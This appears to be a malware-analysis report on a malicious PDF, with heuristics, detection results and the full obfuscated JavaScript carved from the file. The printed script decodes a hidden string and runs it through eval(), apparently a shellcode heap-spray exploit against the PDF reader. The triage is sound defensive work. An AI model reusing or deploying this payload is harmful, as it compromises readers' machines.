MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating and executing arbitrary code. The embedded JavaScript is likely responsible for downloading and executing a second-stage payload, contributing to the suspicious verdict. No specific malware family could be confidently identified.
Machine Learning
- Nyx PDF Classifier malicious score 0.9998
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
function g6VaWrFSv3f8VnUWLgiN(g6VaWrFSv3f8VnUWLgiN,ram4LLyk7qCemX49EAR0) { return g6VaWrFSv3f8VnUWLgiN.substr(ram4LLyk7qCemX49EAR0, 1); }function gu4vTZ06skKECKX4GS4X(Vczep8f0G9TnuNYDmOAV) {var zKa1VywbGrybJo5zmbqt = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");var b9WLNvO0APLzamrvaeMg = new String("aA)2kDvhB8rzJ.1TpybdctfSQoMH <}xUYP(9EL,0Wmsl4KFR7CVOnq{NjI5XweGgZ>iu36");for(LB8Up3KSV0CwzZ7DKM3K=0;LB8Up3KSV0CwzZ7DKM3K<zKa1VywbGrybJo5zmbqt.length;LB8Up3KS … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0006_000.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0xB5 | 3793 bytes |
SHA-256: 755953f79d91a9ff709d7281b4d11fea39b448ad3b7dc8618691e382ea40f8d1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). 25 of 41 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function g6VaWrFSv3f8VnUWLgiN(g6VaWrFSv3f8VnUWLgiN,ram4LLyk7qCemX49EAR0) { return g6VaWrFSv3f8VnUWLgiN.substr(ram4LLyk7qCemX49EAR0, 1); }function gu4vTZ06skKECKX4GS4X(Vczep8f0G9TnuNYDmOAV) {var zKa1VywbGrybJo5zmbqt = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");var b9WLNvO0APLzamrvaeMg = new String("aA)2kDvhB8rzJ.1TpybdctfSQoMH <}xUYP(9EL,0Wmsl4KFR7CVOnq{NjI5XweGgZ>iu36");for(LB8Up3KSV0CwzZ7DKM3K=0;LB8Up3KSV0CwzZ7DKM3K<zKa1VywbGrybJo5zmbqt.length;LB8Up3KSV0CwzZ7DKM3K++) {if(Vczep8f0G9TnuNYDmOAV == g6VaWrFSv3f8VnUWLgiN(b9WLNvO0APLzamrvaeMg, LB8Up3KSV0CwzZ7DKM3K)) {return g6VaWrFSv3f8VnUWLgiN(zKa1VywbGrybJo5zmbqt, LB8Up3KSV0CwzZ7DKM3K);}}return Vczep8f0G9TnuNYDmOAV;}var AwzPaKllqJzYjcTunHVl = new String;var xYGavAa0Brr5egK4qwgX = new String("N(Ov(ev=vR,jv8OO(5)2;0{REqs7Rv0e)NeBvNG2kjmsK,v)NehK,RWqm*GaNG2kNev+=vNe;DNev=vNehn{9nqOsRW)wBNG/G2;O,q{ORvNe;D0{REqs7Rv0G)2kN(Ovnev=v{R,nE(C,)\"%{>g>w%{>G>e%{>u>i%{6E>>%{ww,3%{wwww%{>Lww%{,L3g%{gewL%{iZEw%{Zwwg%{u3gw%{39wE%{wEZw%{uw39%{(LeE%{Zw39%{,9w3%{39w6%{gZZw%{Zw3L%{39uE%{gEZw%{>u>i%{>,9,%{wwwe%{weww%{90,,%{weZ,%{wwww%{,0we%{Li,3%{wwwe%{>0ww%{36>,%{3e,(%{>,EG%{wwwe%{>Gww%{3wi3%{wwww%{00ww%{Z,6>%{wwwe%{36ww%{3e,(%{>,EG%{wwwe%{geww%{we0i%{3(EG%{g>6E%{wGig%{wwww%{093w%{uZww%{33wi%{gGeE%{,9Zi%{Ei,,%{gGwZ%{36ww%{3e,(%{Z>EG%{wwwG%{>Gww%{6>00%{we>G%{wwww%{,(36%{EG3e%{wG>w%{wwww%{>w>G%{6>00%{we>i%{wwww%{wwi(%{wwi(%{,(36%{EG3e%{we>,%{wwww%{36>G%{3e,(%{u3EG%{wwwG%{>Gww%{wwi(%{Lw00%{w>i(%{,(36%{EG3e%{we>,%{wwww%{00>G%{>(6>%{wwwe%{36ww%{3e,(%{>,EG%{wwwe%{>Gww%{3wi3%{wwww%{00ww%{Z,6>%{wwwe%{36ww%{3e,(%{>,EG%{wwwe%{geww%{we0i%{3(EG%{g>6E%{wGi,%{wwww%{093w%{uZww%{33wi%{gGeE%{,9Zi%{Ei,,%{gGwZ%{36ww%{3e,(%{Z>EG%{wwwG%{>Gww%{6>00%{we>G%{wwww%{,(36%{EG3e%{wG>w%{wwww%{>w>G%{6>00%{we>i%{wwww%{wwi(%{wwi(%{,(36%{EG3e%{we>,%{wwww%{36>G%{3e,(%{(gEG%{wwwG%{>Gww%{wwi(%{Lw00%{w>i(%{,(36%{EG3e%{we>,%{wwww%{00>G%{>(6>%{wwwe%{6Lww%{>0>L%{>(>,%{>9>6%{Eg>3%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{i>Zu%{>ZuZ%{iLi>%{>wuw%{uZie%{Zei3%{ZEww%{iei0%{ZEiZ%{iGi6%{ieuG%{u6uG%{wwZe%{i>Zu%{>wuZ%{i0uG%{Zeig%{iZiZ%{i>uG%{ugug%{>uww%{i,i6%{u3Z>%{igi>%{99ww%{0G36%{0u36%{Ewgw%{u>(,%{G60L%{360u%{ge06%{9,Ew%{wwgE%{wwww%{9>wg%{wGe9%{wwww%{(Lii%{3>wg%{wGe9%{wwww%{uw39%{3gu3%{eEEi%{9>wg%{wGe9%{wwww%{9L3L%{wGe0%{wwww%{wg(L%{e93>%{wwwG%{(9ww%{wg(L%{e93>%{wwwG%{>www%{(L(9%{3>wg%{wGe9%{wwww%{>,(9%{L9ge%{>i(L%{3>wg%{wGe9%{wwww%{Ei36%{Lu36%{0E>e%{(i0g%{uZ>6%{>,wZ%{,9Zg%{>,,6%{Le6g%{wg,w%{Gu3>%{wwwG%{geww%{6i0i%{(Lii%{,wEe%{wgwG%{e03>%{wwwG%{36ww%{(LEi%{3>wg%{wGe9%{wwww%{,9Eg%{wwew%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{wwww%{36ww%{e93>%{wwwG%{>iww%{,3>u%{00>3%{0000%{>,>0%{we(9%{3wE,%{99g,%{wGuZ%{,L,9%{>>Eg%{ZE>G%{Z0ZL%{G,Z,%{ZEZZ%{wwZE%{>G>>%{ZZZE%{uui0%{iEi,%{iei0%{>ZiZ%{Zii0%{iEi6%{Zei>%{uwww%{iiiZ%{uwu>%{G,iZ%{u3i>%{wwi>%{uGig%{ugie%{G,i3%{i3uw%{wwuw%{uZi3%{uwuZ%{G0g(%{uuG0%{uuuu%{iEG,%{i9u>%{g>ug%{igG,%{G0i,%{i,u>%{uei6%{i>u>%{iEG0%{iei0%{G,iZ%{i3uw%{wwuw%{6www\"2;N(OvNgv=vwIwEwEwEwE;N(OvNZv=vwIZwwwww;N(OvN>v=vnehK,RWqmv*vG;N(OvNGv=vNZv-v)N>+wIg32;N(OvNev=v{R,nE(C,)\"%{6w6w%{6w6w\"2;Nev=v0e)NeBvNG2;N(OvNiv=v)Ngv-vwIZwwwww2/NZ;07Ov)N(OvNu=w;NuaNi;Nu++2k(e[Nu]v=vNev+vne;DD0{REqs7Rv0Z)2kN(OvN3v=v(CChNs,j,O},Ons7Rhq7HqOsRW)2;N3v=N3hO,CK(E,)/\\J/WB\'\'2;N(OvN6v=vR,jv8OO(5)N3hEm(O8q)w2BN3hEm(O8q)e2BN3hEm(O8q)G22;s0v))N6[w]v==v3v&&v))N6[e]v==vev&&vN6[G]vavG2v||vN6[e]vave22v||v)N6[w]v==vuv&&vN6[e]vave2v||v)N6[w]vavu22vk0G)2;N(Ovjev=v{R,nE(C,)\"%{wEwE%{wEwE\"2;jmsK,)jehK,RWqmvavZZ6>G2vjev+=vje;qmsnhE7KK(9Hq7O,v=vz7KK(9hE7KK,Eq.F(sKyR07)kn{9l:v\"\"BFnW:vjeD2;DD0Z)2;");for(AWwfyFQcNmDBAJbwK1mL=0;AWwfyFQcNmDBAJbwK1mL<xYGavAa0Brr5egK4qwgX.length;AWwfyFQcNmDBAJbwK1mL++)AwzPaKllqJzYjcTunHVl += gu4vTZ06skKECKX4GS4X(g6VaWrFSv3f8VnUWLgiN(xYGavAa0Brr5egK4qwgX,AWwfyFQcNmDBAJbwK1mL));eval(AwzPaKllqJzYjcTunHVl);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.